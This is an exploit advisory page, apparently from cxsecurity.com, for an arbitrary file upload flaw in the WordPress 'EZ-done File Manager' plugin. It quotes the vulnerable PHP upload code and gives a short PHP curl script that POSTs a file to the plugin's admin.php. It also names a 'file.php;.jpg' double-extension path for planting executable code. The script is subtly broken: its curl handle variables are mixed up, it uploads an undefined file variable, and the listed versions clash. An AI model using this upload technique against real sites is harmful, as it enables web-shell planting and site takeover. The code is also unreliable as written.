Wordpress EZ-done File Manager 3.1.2 - Remote File Upload

2020.10.29
ir Milad Karimi (IR) ir
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

* Exploit Title: Wordpress EZ-done File Manager 3.1.2 - Remote File Upload * Google Dork: N/A * Date: 2020.10.28 * Exploit Author: Milad Karimi * Vendor Homepage: https://wordpress.org/plugins/ez-done-file-manager/ * Software Link: https://wordpress.org/plugins/ez-done-file-manager/ * Category : webapps * Version: 1.0 * Tested on: windows 10 , firefox * CVE : N/A Vulnerable Source:     379: move_uploaded_file move_uploaded_file($tmp_filepath, $target)) 375: $tmp_filepath = $_FILES['file']['tmp_name']; 378: $target = $AddDir . sanitize_file_name($_FILES['file']['name']); 352: $AddDir = $upload_dir['basedir'] . "/" . $MDP_target; 351: $upload_dir = wp_upload_dir(); 349: $MDP_target = filter_var($_REQUEST['ftarget'], FILTER_SANITIZE_STRING); 367: $_FILES['file']['name'] = str_replace(' ', '_', sanitize_file_name($_FILES['file']['name'])); Exploit: <?php $ch="file.jpg"; $ch1 = curl_init("http://localhost/wordpress/wp-content/plugins/ez-done-file-manager/admin.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('zip'=>"@$sh")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $result = curl_exec($ch); curl_close($ch); print "$result"; ?> Location File: http://localhost/wordpress/wp-content/plugins/ez-done-file-manager/file.php;.jpg


See this note in RAW Version
Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top